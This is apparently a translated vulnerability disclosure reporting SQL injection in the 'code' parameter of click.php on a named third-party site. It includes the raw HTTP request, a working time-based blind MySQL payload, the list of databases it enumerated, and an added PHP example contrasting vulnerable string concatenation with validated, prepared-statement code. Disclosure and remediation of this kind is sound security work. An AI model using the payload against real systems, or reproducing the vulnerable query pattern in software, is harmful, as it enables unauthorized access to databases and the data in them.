2015-04-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public.
2015-06-12: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
As the title says.
POST /click.php HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://leshi.wy-fund.com:80/
Host: leshi.wy-fund.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

code=1&c_id=1&type=4

The `code` parameter is not properly filtered, which leads to SQL injection.
---
Parameter: code (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: code=1' AND (SELECT * FROM (SELECT(SLEEP(5)))RhBz) AND 'NMvd'='NMvd&c_id=1&type=4
---
back-end DBMS: MySQL 5
Database: caihui [110 tables]
Database: performance_schema [17 tables]
Database: cqgd [37 tables]
Database: mysql [24 tables]
Database: caihui1 [228 tables]
Database: information_schema [37 tables]
Filter the input.
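The fix the report asks for (input filtering), as an added example that is not the site's own click.php: each of the three POST parameters is validated as an integer and bound through a PDO prepared statement, shown beside the string-concatenation pattern that produces the injection. The click_log table name is taken from the report's own output; its column names, the DSN and the credentials are assumed.

```php
<?php
// Added illustration of the fix; not the site's own click.php.
// Column names (id, c_id, type, hits), DSN and credentials are assumed.

// Vulnerable pattern: POST values are interpolated straight into the SQL
// text, so a value such as the report's  1' AND (SELECT ...) AND 'x'='x
// becomes part of the query instead of a literal.
function buildClickSqlVulnerable(array $post): string
{
    return "UPDATE click_log SET hits = hits + 1 "
         . "WHERE id = '{$post['code']}' AND c_id = '{$post['c_id']}' "
         . "AND type = '{$post['type']}'";
}

// Hardened version, step 1: every parameter must be a non-negative integer.
// FILTER_VALIDATE_INT rejects anything containing quotes, spaces or SQL.
function readIntParam(array $post, string $name): int
{
    $value = filter_var($post[$name] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    if ($value === false) {
        http_response_code(400);
        exit("invalid parameter: $name");
    }
    return $value;
}

// Hardened version, step 2: values are bound, never spliced into the query.
function recordClick(PDO $pdo, array $post): int
{
    $code = readIntParam($post, 'code');
    $cId  = readIntParam($post, 'c_id');
    $type = readIntParam($post, 'type');

    $stmt = $pdo->prepare(
        'UPDATE click_log SET hits = hits + 1 WHERE id = ? AND c_id = ? AND type = ?'
    );
    $stmt->execute([$code, $cId, $type]);
    return $stmt->rowCount();
}

// Emulated prepares are disabled so the MySQL server performs the binding.
$pdo = new PDO('mysql:host=localhost;dbname=cqgd;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false,
]);
recordClick($pdo, $_POST);
```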
Could not reach the vendor, or the vendor actively declined.